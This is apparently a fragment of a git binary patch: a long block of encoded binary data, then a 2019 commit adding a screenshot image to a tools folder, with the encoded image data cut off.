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 b3!=~5#*be4t)uS=^u5VRixVZsU9bK>bf;VI From d6edb0657d17f6568627f61e4aa6a2ed45809603 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 8 May 2019 01:07:38 +0100 Subject: [PATCH 104/214] Add files via upload --- tools/screenshot1.png | Bin 0 -> 65923 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 tools/screenshot1.png diff --git a/tools/screenshot1.png b/tools/screenshot1.png new file mode 100644 index 0000000000000000000000000000000000000000..09bf7aa969d437421d40a5641342f641b38a6c21 GIT binary patch literal 65923 zcmXt20g;LxC1S{?ZiaQi{iWUe?ptuz$KyY`LH~$as zo!PmQJ3BWY?%8Lb^E+pwKB+6?U{YcN00117_X=770E!*}fCNBCg+G~)mh6S!klo*@ z=%B+d5W00F{5OS%qJf9Dv#p1>g_{lFi<7gX4Y#|Mn~jZ=yPdPgDN>g-d=mG6ljPlO zEIjO;o#=J!9c=*mHrDifqV#GOKJ)^7{9^Qc{Nj8<;`{>ia%%MYaylCymTLe2dVq?8 zoDML1%inv&R59h%J9o=}#*ZQHiuT?6upa=qHw7xPf4DIJkRqE<@f=3C3eT=Kaor&y zFqvZv{P^^aH@fi$K03><+aGIwYquFty4&&54EOPsT^012c0U=qkO`kJJF{ZDqit{9 z)mofZxnA@ocbuoUPjREB0t}85=tD@}JYpwQ zr0J(SId{oIlXx~p?PRgitc{yz%rk{LMoDDSsrTmZ@BpfBoOUfjX(Q$@i!RA$yLY(( zKhal(uZoY6p}%tYgSbNkRcHEKv$VFo0IKoJT9Sj^|Tso2sbpv(i&7=8VKbA-j;ifvocX}@Jq=ihEdJfx=Gkc&cW1S7<|d=R4i}YgZ3o8 zr!cmoTj^CsQ166u+57&u`9cldc2m%>)%RGV%>Oyztn9ZYLS!QZ#Qwwzdh|(~L<*+R z{(IDD9B-aMOHB)N4H@IdAsv%Il<(K@tXn{}geGkiJpG(*<*pZ!|5knUBxe4h*ck6y zJVke^)$&9*Hn72qUuq3ClB*NX61@ELgP7ko`i_l-75O&gCw7o(OX?;MO1f)oT6PXm zMp`6S>#5#7?v;!GGIdJ{nu`>EhS9i4M7i(K`KRTG;5Ym$<0ABFwHibo?U=%j78%F8 